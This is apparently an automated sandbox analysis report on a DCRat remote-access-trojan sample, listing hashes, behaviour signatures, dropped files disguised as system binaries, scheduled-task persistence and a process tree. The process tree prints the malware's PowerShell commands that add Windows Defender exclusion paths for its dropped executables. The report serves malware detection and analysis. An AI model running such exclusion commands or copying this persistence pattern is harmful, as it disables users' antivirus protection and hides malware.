dcrat | 1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03/11/2022, 01:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe
Size

1.3MB
MD5

51a3d3a7c05b6a0f1582578394e03444
SHA1

8bd50437c988363e8ece7c2d8c1942920d4c7767
SHA256

1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a
SHA512

2a3700f61215c6c7df99d496a2ab0110ec0dc5bc35a2f2d09dbdc2395e2357f20c0a8461832df9964638069f24c99d64fb2a2c20c4ced79ce14f05087b7b6695
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4176	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4992	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2100	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4284	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3964	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	724	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1036	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4540	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3944	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4616	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4712	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	836	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2304	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2860	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1336	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1316	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	996	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2060	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3700	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4312	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4992	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	836	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	808	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4556	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1496	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1072	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3224	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4424	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4232	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4104	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	1388	schtasks.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	1388	schtasks.exe	15

DCRat payload 16 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0008000000022e07-137.dat	dcrat
behavioral1/files/0x0008000000022e07-138.dat	dcrat
behavioral1/memory/2400-139-0x0000000000F30000-0x0000000001040000-memory.dmp	dcrat
behavioral1/files/0x0008000000022e07-149.dat	dcrat
behavioral1/files/0x0008000000022e07-170.dat	dcrat
behavioral1/files/0x0006000000022e12-176.dat	dcrat
behavioral1/files/0x0006000000022e62-268.dat	dcrat
behavioral1/files/0x0006000000022e62-267.dat	dcrat
behavioral1/files/0x0006000000022e62-291.dat	dcrat
behavioral1/files/0x0006000000022e62-299.dat	dcrat
behavioral1/files/0x0006000000022e62-306.dat	dcrat
behavioral1/files/0x0006000000022e62-313.dat	dcrat
behavioral1/files/0x0006000000022e62-320.dat	dcrat
behavioral1/files/0x0006000000022e62-327.dat	dcrat
behavioral1/files/0x0006000000022e62-334.dat	dcrat
behavioral1/files/0x0006000000022e62-341.dat	dcrat

Executes dropped EXE 12 IoCs

pid	Process
2400	DllCommonsvc.exe
840	schtasks.exe
4608	DllCommonsvc.exe
5724	powershell.exe
452	powershell.exe
1436	powershell.exe
3588	powershell.exe
2880	powershell.exe
1312	powershell.exe
5164	powershell.exe
5196	powershell.exe
3440	powershell.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 22 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Media Player\winlogon.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\e1ef82546f0b02	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\explorer.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Defender\it-IT\spoolsv.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\cc11b995f2a76d	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\7a0fd90576e088	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Portable Devices\powershell.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\c5b4cb5e9653cc	DllCommonsvc.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\server\conhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\server\088424020bedd6	DllCommonsvc.exe
File created	C:\Program Files\Windows Defender\it-IT\f3b6ecef712a24	DllCommonsvc.exe
File created	C:\Program Files\7-Zip\Lang\a76d7bf15d8370	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\5b884080fd4f94	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\SppExtComObj.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\powershell.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\ea9f0e6c9e2dcd	DllCommonsvc.exe
File created	C:\Program Files\7-Zip\Lang\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\fontdrvhost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Portable Devices\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\taskhostw.exe	DllCommonsvc.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\LiveKernelReports\e978f868350d50	schtasks.exe
File created	C:\Windows\SchCache\TrustedInstaller.exe	DllCommonsvc.exe
File created	C:\Windows\SchCache\04c1e7795967e4	DllCommonsvc.exe
File created	C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\088424020bedd6	DllCommonsvc.exe
File created	C:\Windows\CbsTemp\smss.exe	schtasks.exe
File created	C:\Windows\CbsTemp\69ddcba757bf72	schtasks.exe
File created	C:\Windows\LiveKernelReports\powershell.exe	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4340	schtasks.exe
3760	schtasks.exe
3772	schtasks.exe
808	schtasks.exe
1992	schtasks.exe
5040	schtasks.exe
4440	schtasks.exe
4992	schtasks.exe
1316	schtasks.exe
4212	schtasks.exe
4540	schtasks.exe
2304	schtasks.exe
1336	schtasks.exe
3224	schtasks.exe
1308	schtasks.exe
3136	schtasks.exe
4720	schtasks.exe
4516	schtasks.exe
4900	schtasks.exe
2208	schtasks.exe
996	schtasks.exe
4476	schtasks.exe
1952	schtasks.exe
2860	schtasks.exe
3592	schtasks.exe
2652	schtasks.exe
1496	schtasks.exe
876	schtasks.exe
1316	schtasks.exe
1072	schtasks.exe
3992	schtasks.exe
4456	schtasks.exe
396	schtasks.exe
2100	schtasks.exe
1896	schtasks.exe
3460	schtasks.exe
1436	schtasks.exe
4156	schtasks.exe
2060	schtasks.exe
840	schtasks.exe
4992	schtasks.exe
4424	schtasks.exe
4104	schtasks.exe
1972	schtasks.exe
3180	schtasks.exe
3152	schtasks.exe
3048	schtasks.exe
1524	schtasks.exe
4616	schtasks.exe
3756	schtasks.exe
4556	schtasks.exe
2464	schtasks.exe
1564	schtasks.exe
220	schtasks.exe
4712	schtasks.exe
5004	schtasks.exe
3944	schtasks.exe
3964	schtasks.exe
724	schtasks.exe
2880	schtasks.exe
4308	schtasks.exe
4284	schtasks.exe
2172	schtasks.exe
2844	schtasks.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2400	DllCommonsvc.exe
3468	powershell.exe
3668	powershell.exe
4956	powershell.exe
5004	schtasks.exe
3796	powershell.exe
3796	powershell.exe
3572	powershell.exe
3572	powershell.exe
4956	powershell.exe
4956	powershell.exe
840	schtasks.exe
840	schtasks.exe
3668	powershell.exe
3668	powershell.exe
3468	powershell.exe
3468	powershell.exe
840	schtasks.exe
840	schtasks.exe
840	schtasks.exe
840	schtasks.exe
840	schtasks.exe
840	schtasks.exe
5004	schtasks.exe
5004	schtasks.exe
3572	powershell.exe
3796	powershell.exe
4176	powershell.exe
4176	powershell.exe
3804	powershell.exe
3804	powershell.exe
4808	Conhost.exe
4808	Conhost.exe
3452	powershell.exe
3452	powershell.exe
316	powershell.exe
316	powershell.exe
3988	powershell.exe
3988	powershell.exe
3512	powershell.exe
3512	powershell.exe
1576	powershell.exe
1576	powershell.exe
3988	powershell.exe
4608	DllCommonsvc.exe
4608	DllCommonsvc.exe
4176	powershell.exe
4176	powershell.exe
3804	powershell.exe
3804	powershell.exe
4608	DllCommonsvc.exe
4608	DllCommonsvc.exe
4808	Conhost.exe
3452	powershell.exe
316	powershell.exe
3512	powershell.exe
1576	powershell.exe
1424	schtasks.exe
1424	schtasks.exe
4212	schtasks.exe
4212	schtasks.exe
4900	schtasks.exe
4900	schtasks.exe
1496	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	2400	DllCommonsvc.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	5004	schtasks.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	840	schtasks.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	4808	Conhost.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	4608	DllCommonsvc.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1424	schtasks.exe
Token: SeDebugPrivilege	4212	schtasks.exe
Token: SeDebugPrivilege	4900	schtasks.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	1308	schtasks.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeDebugPrivilege	5452	powershell.exe
Token: SeDebugPrivilege	5412	powershell.exe
Token: SeDebugPrivilege	5504	powershell.exe
Token: SeDebugPrivilege	5724	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	5164	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 2220	1236	1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe	79
PID 1236 wrote to memory of 2220	1236	1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe	79
PID 1236 wrote to memory of 2220	1236	1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe	79
PID 2220 wrote to memory of 5016	2220	WScript.exe	83
PID 2220 wrote to memory of 5016	2220	WScript.exe	83
PID 2220 wrote to memory of 5016	2220	WScript.exe	83
PID 5016 wrote to memory of 2400	5016	cmd.exe	85
PID 5016 wrote to memory of 2400	5016	cmd.exe	85
PID 2400 wrote to memory of 3572	2400	DllCommonsvc.exe	102
PID 2400 wrote to memory of 3572	2400	DllCommonsvc.exe	102
PID 2400 wrote to memory of 3468	2400	DllCommonsvc.exe	103
PID 2400 wrote to memory of 3468	2400	DllCommonsvc.exe	103
PID 2400 wrote to memory of 3668	2400	DllCommonsvc.exe	104
PID 2400 wrote to memory of 3668	2400	DllCommonsvc.exe	104
PID 2400 wrote to memory of 3796	2400	DllCommonsvc.exe	108
PID 2400 wrote to memory of 3796	2400	DllCommonsvc.exe	108
PID 2400 wrote to memory of 4956	2400	DllCommonsvc.exe	107
PID 2400 wrote to memory of 4956	2400	DllCommonsvc.exe	107
PID 2400 wrote to memory of 5004	2400	DllCommonsvc.exe	112
PID 2400 wrote to memory of 5004	2400	DllCommonsvc.exe	112
PID 2400 wrote to memory of 840	2400	DllCommonsvc.exe	160
PID 2400 wrote to memory of 840	2400	DllCommonsvc.exe	160
PID 840 wrote to memory of 3804	840	schtasks.exe	135
PID 840 wrote to memory of 3804	840	schtasks.exe	135
PID 840 wrote to memory of 4176	840	schtasks.exe	150
PID 840 wrote to memory of 4176	840	schtasks.exe	150
PID 840 wrote to memory of 4808	840	schtasks.exe	188
PID 840 wrote to memory of 4808	840	schtasks.exe	188
PID 840 wrote to memory of 3452	840	schtasks.exe	137
PID 840 wrote to memory of 3452	840	schtasks.exe	137
PID 840 wrote to memory of 316	840	schtasks.exe	139
PID 840 wrote to memory of 316	840	schtasks.exe	139
PID 840 wrote to memory of 3988	840	schtasks.exe	140
PID 840 wrote to memory of 3988	840	schtasks.exe	140
PID 840 wrote to memory of 3512	840	schtasks.exe	141
PID 840 wrote to memory of 3512	840	schtasks.exe	141
PID 840 wrote to memory of 1576	840	schtasks.exe	143
PID 840 wrote to memory of 1576	840	schtasks.exe	143
PID 840 wrote to memory of 4608	840	schtasks.exe	154
PID 840 wrote to memory of 4608	840	schtasks.exe	154
PID 4608 wrote to memory of 1424	4608	DllCommonsvc.exe	241
PID 4608 wrote to memory of 1424	4608	DllCommonsvc.exe	241
PID 4608 wrote to memory of 4212	4608	DllCommonsvc.exe	246
PID 4608 wrote to memory of 4212	4608	DllCommonsvc.exe	246
PID 4608 wrote to memory of 4900	4608	DllCommonsvc.exe	239
PID 4608 wrote to memory of 4900	4608	DllCommonsvc.exe	239
PID 4608 wrote to memory of 1496	4608	DllCommonsvc.exe	203
PID 4608 wrote to memory of 1496	4608	DllCommonsvc.exe	203
PID 4608 wrote to memory of 3228	4608	DllCommonsvc.exe	202
PID 4608 wrote to memory of 3228	4608	DllCommonsvc.exe	202
PID 4608 wrote to memory of 388	4608	DllCommonsvc.exe	200
PID 4608 wrote to memory of 388	4608	DllCommonsvc.exe	200
PID 4608 wrote to memory of 1308	4608	DllCommonsvc.exe	245
PID 4608 wrote to memory of 1308	4608	DllCommonsvc.exe	245
PID 4608 wrote to memory of 2528	4608	DllCommonsvc.exe	196
PID 4608 wrote to memory of 2528	4608	DllCommonsvc.exe	196
PID 4608 wrote to memory of 3756	4608	DllCommonsvc.exe	186
PID 4608 wrote to memory of 3756	4608	DllCommonsvc.exe	186
PID 4608 wrote to memory of 3224	4608	DllCommonsvc.exe	182
PID 4608 wrote to memory of 3224	4608	DllCommonsvc.exe	182
PID 4608 wrote to memory of 1896	4608	DllCommonsvc.exe	184
PID 4608 wrote to memory of 1896	4608	DllCommonsvc.exe	184
PID 4608 wrote to memory of 4280	4608	DllCommonsvc.exe	187
PID 4608 wrote to memory of 4280	4608	DllCommonsvc.exe	187

C:\Users\Admin\AppData\Local\Temp\1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe
"C:\Users\Admin\AppData\Local\Temp\1ee37b11fbaca2f7df4ccc51c45581c0907a1c432fbdf895fd46e04748154e4a.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1236
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\fontdrvhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\it-IT\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\winlogon.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
        5⤵
        
        PID:5004
    - - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        5⤵
        
        PID:840
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\conhost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\conhost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:316
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\smss.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\LiveKernelReports\powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
